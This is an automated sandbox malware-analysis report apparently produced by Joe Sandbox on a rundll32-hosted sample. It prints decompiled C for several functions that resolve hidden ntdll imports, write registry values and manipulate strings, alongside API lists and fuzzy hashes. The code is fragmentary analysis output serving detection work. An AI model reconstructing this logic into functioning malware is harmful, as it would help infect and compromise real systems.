0x00a14e7f
0x00a14e7a
0x00a14e86
0x00a14e9c
0x00a14e88
0x00a14e88
0x00a14e95
0x00a14e95
0x00a14ea0
0x00a14ea2
0x00a14eac
0x00a14eb1
0x00a14eb1
0x00a14eac
0x00a14eb8
0x00a14ece
0x00a14eba
0x00a14eba
0x00a14ec7
0x00a14ec7
0x00a14ed2
0x00a14ed4
0x00a14ede
0x00a14ee3
0x00a14ee3
0x00a14ede
0x00a14eea
0x00a14f00
0x00a14eec
0x00a14eec
0x00a14ef9
0x00a14ef9
0x00a14f04
0x00a14f06
0x00a14f09
0x00a14f0a
0x00a14f11
0x00a14f13
0x00a14f14
0x00a14f14
0x00a14f11
0x00a14f1b
0x00a14f31
0x00a14f1d
0x00a14f1d
0x00a14f2a
0x00a14f2a
0x00a14f35
0x00a14f43
0x00a14f4d
0x00a14f4d
0x00a14f5a
0x00a14f67
0x00a14f6b
0x00a14f6b

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00A17260,?,00A17260,63699BC3,?,00A17260,63699BC3,E8FA7DD7,00A1D00C,770CC740,?,?,00A17260), ref: 00A14E12
StrToIntExA.SHLWAPI(00000000,00000000,00A17260,?,00A17260,63699BC3,?,00A17260,63699BC3,E8FA7DD7,00A1D00C,770CC740,?,?,00A17260), ref: 00A14E44
StrToIntExA.SHLWAPI(00000000,00000000,00A17260,?,00A17260,63699BC3,?,00A17260,63699BC3,E8FA7DD7,00A1D00C,770CC740,?,?,00A17260), ref: 00A14E76
StrToIntExA.SHLWAPI(00000000,00000000,00A17260,?,00A17260,63699BC3,?,00A17260,63699BC3,E8FA7DD7,00A1D00C,770CC740,?,?,00A17260), ref: 00A14EA8
StrToIntExA.SHLWAPI(00000000,00000000,00A17260,?,00A17260,63699BC3,?,00A17260,63699BC3,E8FA7DD7,00A1D00C,770CC740,?,?,00A17260), ref: 00A14EDA
HeapFree.KERNEL32(00000000,?,?,00A17260,63699BC3,?,00A17260,63699BC3,E8FA7DD7,00A1D00C,770CC740,?,?,00A17260), ref: 00A14F5A

Strings

Uxt, xrefs: 00A14F5A

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: c7045694c4b91d79ad3fb38be2c3e13916cdbff5b35c06bd811add5a95412ae6
Instruction ID: 4cc36422a7ca5cc859bbea33dcdb360f8e20b4cc034f906daba11323496c566e
Opcode Fuzzy Hash: c7045694c4b91d79ad3fb38be2c3e13916cdbff5b35c06bd811add5a95412ae6
Instruction Fuzzy Hash: 4F5192B4A14214AACB10EBFDDD85DDF77EEAB8C740B248925F502D7244EA31DDC29B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A149EC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A149EC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xa1d230; // 0x4a6a5a8
				_t1 = _t9 + 0xa1e61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00A18990(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x5489631
					_t41 = E00A1550F(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00A151A8(_t34, _t41, _a8);
						E00A1A07B(_t41);
						_t42 = E00A1401A(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00A1A07B(_t36);
							_t36 = _t42;
						}
						_t43 = E00A153E6(_t36, _t33);
						if(_t43 != 0) {
							E00A1A07B(_t36);
							_t36 = _t43;
						}
					}
					E00A1A07B(_t28);
				}
				return _t36;
			}

0x00a149ec
0x00a149ef
0x00a149f0
0x00a149f8
0x00a149ff
0x00a14a06
0x00a14a0a
0x00a14a10
0x00a14a17
0x00a14a1c
0x00a14a24
0x00a14a2e
0x00a14a32
0x00a14a36
0x00a14a3c
0x00a14a41
0x00a14a51
0x00a14a53
0x00a14a6a
0x00a14a6e
0x00a14a71
0x00a14a76
0x00a14a76
0x00a14a7f
0x00a14a83
0x00a14a86
0x00a14a8b
0x00a14a8b
0x00a14a83
0x00a14a8e
0x00a14a8e
0x00a14a99

APIs

Part of subcall function 00A18990: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A14A06,253D7325,00000000,00000000,00000000,?,00000000,00A13E0F), ref: 00A189F7
Part of subcall function 00A18990: sprintf.NTDLL ref: 00A18A18

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A17
lstrlen.KERNEL32(00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A1F

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

strcpy.NTDLL ref: 00A14A36
lstrcat.KERNEL32(00000000,00000000), ref: 00A14A41

Part of subcall function 00A151A8: lstrlen.KERNEL32(00000000,00000000,00A13E0F,00A13E0F,00000001,00000000,00000000,?,00A14A50,00000000,00A13E0F,?,00000000,00A13E0F,00000000,05489630), ref: 00A151BF

Part of subcall function 00A1A07B: HeapFree.KERNEL32(00000000,00000000,00A18705,00000000,?,?,00000000,?,?,?,?,?,?,00A12540,00000000), ref: 00A1A087

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A13E0F,?,00000000,00A13E0F,00000000,05489630), ref: 00A14A5E

Part of subcall function 00A1401A: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00A14A6A,00000000,?,00000000,00A13E0F,00000000,05489630), ref: 00A14024
Part of subcall function 00A1401A: _snprintf.NTDLL ref: 00A14082

Strings

=, xrefs: 00A14A58

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: cec82da65b0f677a491868f0b9c43e5aa543e2398ad15ed655cec194802a012c
Instruction ID: 2faf77d14f07a169b64a670608533b8e88580cca4f54de379be297fecd335808
Opcode Fuzzy Hash: cec82da65b0f677a491868f0b9c43e5aa543e2398ad15ed655cec194802a012c
Instruction Fuzzy Hash: 4B11E033901925B78612BBF88D85CEF36AE9E8D7A13060015FA019B201DE38CD8347E5

Uniqueness

Uniqueness Score: -1.00%

Function 6FC6A4E3, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6FC6A4E3

Part of subcall function 6FC68FAA: RtlEncodePointer.NTDLL(00000000), ref: 6FC68FAD
Part of subcall function 6FC68FAA: __initp_misc_winsig.LIBCMT ref: 6FC68FC8
Part of subcall function 6FC68FAA: GetModuleHandleW.KERNEL32(6FC7F718), ref: 6FC6D9BF

__mtinitlocks.LIBCMT ref: 6FC6A4E8
__mtterm.LIBCMT ref: 6FC6A4F1

Part of subcall function 6FC6A559: RtlDeleteCriticalSection.NTDLL ref: 6FC6E244
Part of subcall function 6FC6A559: _free.LIBCMT ref: 6FC6E24B
Part of subcall function 6FC6A559: RtlDeleteCriticalSection.NTDLL(6FC85B50), ref: 6FC6E26D

__calloc_crt.LIBCMT ref: 6FC6A516
__initptd.LIBCMT ref: 6FC6A538
GetCurrentThreadId.KERNEL32 ref: 6FC6A53F

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 1551663144-0
Opcode ID: 54946cfb5baf866c943cee1f86f4e6ce40ed96a72e95df445e74b8eba80b5f6e
Instruction ID: bfe4c9cd84472a0879d6ecefc62d9caca74759b8d6d942bee9773aacc0666982
Opcode Fuzzy Hash: 54946cfb5baf866c943cee1f86f4e6ce40ed96a72e95df445e74b8eba80b5f6e
Instruction Fuzzy Hash: 0BF0B43252DB339DE614A7B87C8579A3BD4DFC3638B205A1AF665E40C0FF15A8498354

Uniqueness

Uniqueness Score: -1.00%

Function 00A19574, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00A195D0
SysAllocString.OLEAUT32(0070006F), ref: 00A195E4
SysAllocString.OLEAUT32(00000000), ref: 00A195F6
SysFreeString.OLEAUT32(00000000), ref: 00A1965A
SysFreeString.OLEAUT32(00000000), ref: 00A19669
SysFreeString.OLEAUT32(00000000), ref: 00A19674

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 06f51b97173cb5a5a58d070a270b696d2704b1acaad49dade8fd57e8b894bf22
Instruction ID: 1b7348d380854bdcf6cb56a8ef744dc5ae6d688d1c53e0afc4925684d8f36c20
Opcode Fuzzy Hash: 06f51b97173cb5a5a58d070a270b696d2704b1acaad49dade8fd57e8b894bf22
Instruction Fuzzy Hash: D3314C32D00609ABDB01DFE8C948ADFB7BAAF49310F154465ED20EB120DB759D46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1484A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A1484A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00A1550F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xa1d230; // 0x4a6a5a8
					_t1 = _t23 + 0xa1e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xa1d230; // 0x4a6a5a8
					_t2 = _t26 + 0xa1e787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00A1A07B(_t54);
					} else {
						_t30 =  *0xa1d230; // 0x4a6a5a8
						_t5 = _t30 + 0xa1e774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xa1d230; // 0x4a6a5a8
							_t7 = _t33 + 0xa1e797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xa1d230; // 0x4a6a5a8
								_t9 = _t36 + 0xa1e756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xa1d230; // 0x4a6a5a8
									_t11 = _t39 + 0xa1e7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00A16EF1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00a14859
0x00a1485d
0x00a1491f
0x00a14863
0x00a14863
0x00a14868
0x00a1487b
0x00a1487d
0x00a14882
0x00a1488a
0x00a14891
0x00a14895
0x00a14898
0x00a14917
0x00a14918
0x00a1489a
0x00a1489a
0x00a1489f
0x00a148a7
0x00a148ab
0x00a148ae
0x00000000
0x00a148b0
0x00a148b0
0x00a148b5
0x00a148bd
0x00a148c1
0x00a148c4
0x00000000
0x00a148c6
0x00a148c6
0x00a148cb
0x00a148d3
0x00a148d7
0x00a148da
0x00000000
0x00a148dc
0x00a148dc
0x00a148e1
0x00a148e9
0x00a148ed
0x00a148f0
0x00000000
0x00a148f2
0x00a148f8
0x00a148fd
0x00a14904
0x00a1490b
0x00a1490e
0x00000000
0x00a14910
0x00a14913
0x00a14913
0x00a1490e
0x00a148f0
0x00a148da
0x00a148c4
0x00a148ae
0x00a14898
0x00a1492d

APIs

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00A1A418,?,?,?,?,00000000,00000000), ref: 00A1486F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A14891
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A148A7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A148BD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A148D3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A148E9

Part of subcall function 00A16EF1: memset.NTDLL ref: 00A16F70

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 7b81bea69995a5ec07a1a3d8bd72771844c40cb850e43a387cc08c257b8c33c5
Instruction ID: 9c555cb9579eee098e2572a74eb38eef0a594649f6f7a170f8d1e606903607cc
Opcode Fuzzy Hash: 7b81bea69995a5ec07a1a3d8bd72771844c40cb850e43a387cc08c257b8c33c5
Instruction Fuzzy Hash: 422128B150020AAFEB10DFA9CD44EEB77ECEB0C7547048565E989C7651E734EE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A18760, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A18760(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xa1d2ec);
					_t96 = 0x80000002;
					L6:
					_t60 = E00A18DEA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00A19E7B(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E00A1A07B(_a8);
						goto L29;
					}
					_t65 =  *0xa1d230; // 0x4a6a5a8
					_t16 = _t65 + 0xa1e908; // 0x65696c43
					_t68 = E00A18DEA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d00a1c0
						if(E00A179EF( *_t33, _t96, _a8,  *0xa1d2e4,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xa1d230; // 0x4a6a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0xa1ea0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xa1e927; // 0x55434b48
								_t73 = _t34;
							}
							if(E00A16470( &_a24, _t73,  *0xa1d2e4,  *0xa1d2e8,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0xa1d230; // 0x4a6a5a8
									_t44 = _t75 + 0xa1e893; // 0x74666f53
									_t78 = E00A18DEA(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00a1c0
										E00A163AB( *_t47, _t96, _a8,  *0xa1d2e8, _a24);
										_t49 = _t105 + 0x10; // 0x3d00a1c0
										E00A163AB( *_t49, _t96, _t103,  *0xa1d2e0, _a16);
										E00A1A07B(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00a1c0
									E00A163AB( *_t40, _t96, _a8,  *0xa1d2e8, _a24);
									_t43 = _t105 + 0x10; // 0x3d00a1c0
									E00A163AB( *_t43, _t96, _a8,  *0xa1d2e0, _a16);
								}
								if( *_t105 != 0) {
									E00A1A07B(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00a1c0
					if(E00A17A7D( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d00a1c0
							E00A179EF( *_t26, _t96, _a8, _a24, _t104);
						}
						E00A1A07B(_t104);
						_t102 = _a16;
					}
					E00A1A07B(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0xa1d2ec);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x00a18760
0x00a18769
0x00a18770
0x00a18775
0x00a187e4
0x00a187ea
0x00a187ef
0x00a187f8
0x00a187ff
0x00a18802
0x00a18976
0x00a1897d
0x00a1897d
0x00a18982
0x00a18984
0x00a18984
0x00a1898d
0x00a1898d
0x00a18808
0x00a18814
0x00a1896c
0x00a1896f
0x00000000
0x00a1896f
0x00a1881a
0x00a1881f
0x00a18828
0x00a1882f
0x00a18832
0x00a1887c
0x00a1887c
0x00a1888f
0x00a18899
0x00a188a1
0x00a188a6
0x00a188b0
0x00a188b0
0x00a188a8
0x00a188a8
0x00a188a8
0x00a188a8
0x00a188d2
0x00a188da
0x00a18908
0x00a1890d
0x00a18916
0x00a1891b
0x00a1891f
0x00a18951
0x00a18921
0x00a1892e
0x00a18931
0x00a18941
0x00a18944
0x00a1894a
0x00a1894a
0x00a188dc
0x00a188e9
0x00a188ec
0x00a188fe
0x00a18901
0x00a18901
0x00a1895b
0x00a18967
0x00a1895d
0x00a18960
0x00a18960
0x00a1895b
0x00a188d2
0x00000000
0x00a18899
0x00a18841
0x00a1884b
0x00a1884d
0x00a18852
0x00a18856
0x00a18858
0x00a18863
0x00a18866
0x00a18866
0x00a1886c
0x00a18871
0x00a18871
0x00a18877
0x00000000
0x00a18877
0x00a1877a
0x00000000
0x00a187a1
0x00a187ac
0x00a187c2
0x00a187c8
0x00a187d0
0x00000000
0x00a187d0

APIs

StrChrA.SHLWAPI(00A1262A,0000005F,00000000,00000000,00000104), ref: 00A18793
memcpy.NTDLL(?,00A1262A,?), ref: 00A187AC
lstrcpy.KERNEL32(?), ref: 00A187C2

Part of subcall function 00A18DEA: lstrlen.KERNEL32(?,00A1D2E0,747C7FC0,00000000,00A13FBD,?,?,?,?,?,00A19865,?), ref: 00A18DF3
Part of subcall function 00A18DEA: mbstowcs.NTDLL ref: 00A18E1A
Part of subcall function 00A18DEA: memset.NTDLL ref: 00A18E2C

Part of subcall function 00A163AB: lstrlenW.KERNEL32(00A1262A,?,?,00A18936,3D00A1C0,80000002,00A1262A,00A12829,74666F53,4D4C4B48,00A12829,?,3D00A1C0,80000002,00A1262A,?), ref: 00A163CB

Part of subcall function 00A1A07B: HeapFree.KERNEL32(00000000,00000000,00A18705,00000000,?,?,00000000,?,?,?,?,?,?,00A12540,00000000), ref: 00A1A087

lstrcpy.KERNEL32(?,00000000), ref: 00A187E4

Strings

\, xrefs: 00A187C8

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 9eea7575dda9a47a99f3df722b33d971dbd78a3ff813c92733138f9e73a87ce1
Instruction ID: 9aa381ed083442a3de2bcae5f615d00ab401d11b48cf8e38d5fe99e48647ff4c
Opcode Fuzzy Hash: 9eea7575dda9a47a99f3df722b33d971dbd78a3ff813c92733138f9e73a87ce1
Instruction Fuzzy Hash: C4517B3250020AEFDF11DFA0DD41EEA7BB9EF08340F108515FA65A7161DB39DA95EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A18134, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00A18134(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00A19574(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xa1d230; // 0x4a6a5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xa1e4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xa1e92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xa1d0e4() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00a18134
0x00a1813b
0x00a1813f
0x00a18144
0x00a1814b
0x00a1814e
0x00a18158
0x00a1815d
0x00a18169
0x00a18170
0x00a1817a
0x00a1817a
0x00a18172
0x00a18172
0x00a18172
0x00a18172
0x00a18180
0x00a18183
0x00a1818b
0x00a1818e
0x00a18191
0x00a18194
0x00a18199
0x00a181a2
0x00a181af
0x00a181a4
0x00a181aa
0x00a181aa
0x00a181b5
0x00a181b5
0x00a181bd

APIs

Part of subcall function 00A19574: SysAllocString.OLEAUT32(?), ref: 00A195D0
Part of subcall function 00A19574: SysAllocString.OLEAUT32(0070006F), ref: 00A195E4
Part of subcall function 00A19574: SysAllocString.OLEAUT32(00000000), ref: 00A195F6
Part of subcall function 00A19574: SysFreeString.OLEAUT32(00000000), ref: 00A1965A

memset.NTDLL ref: 00A18158
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A18194
GetLastError.KERNEL32 ref: 00A181A4
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A181B5

Strings

<, xrefs: 00A18169

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: b61ad46c40ce6918ed1e850d92354b70b93260e2d42a0ac4b83746f5327f06d0
Instruction ID: c3257d9900e0d5e54951eb46d45da141adf15f8564250c2a34a150feebfafcef
Opcode Fuzzy Hash: b61ad46c40ce6918ed1e850d92354b70b93260e2d42a0ac4b83746f5327f06d0
Instruction Fuzzy Hash: DE110972900218BBDB10DFA9DD85BDA7BFCAB08390F148116F909E7241D778D645CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A302, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A1A302(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xa1d2d4; // 0x5489630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xa1d2d4; // 0x5489630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xa1d030) {
					HeapFree( *0xa1d1f0, 0, _t8);
				}
				_t14[1] = E00A183FE(_v0);
				_t11 =  *0xa1d2d4; // 0x5489630
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}

0x00a1a302
0x00a1a302
0x00a1a30b
0x00a1a31b
0x00a1a31b
0x00a1a320
0x00a1a325
0x00000000
0x00000000
0x00a1a315
0x00a1a315
0x00a1a327
0x00a1a32b
0x00a1a33d
0x00a1a33d
0x00a1a34d
0x00a1a350
0x00a1a355
0x00a1a359
0x00a1a35f

APIs

RtlEnterCriticalSection.NTDLL(054895F0), ref: 00A1A30B
Sleep.KERNEL32(0000000A,?,?,00A17260,?,?,?,?,?,00A1258B,?,00000001), ref: 00A1A315
HeapFree.KERNEL32(00000000,00000000,?,?,00A17260,?,?,?,?,?,00A1258B,?,00000001), ref: 00A1A33D
RtlLeaveCriticalSection.NTDLL(054895F0), ref: 00A1A359

Strings

Uxt, xrefs: 00A1A33D

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: 6edaf567133eaadecd6fbb17244a96cdc2efd33fe096fbae93810528c80085bc
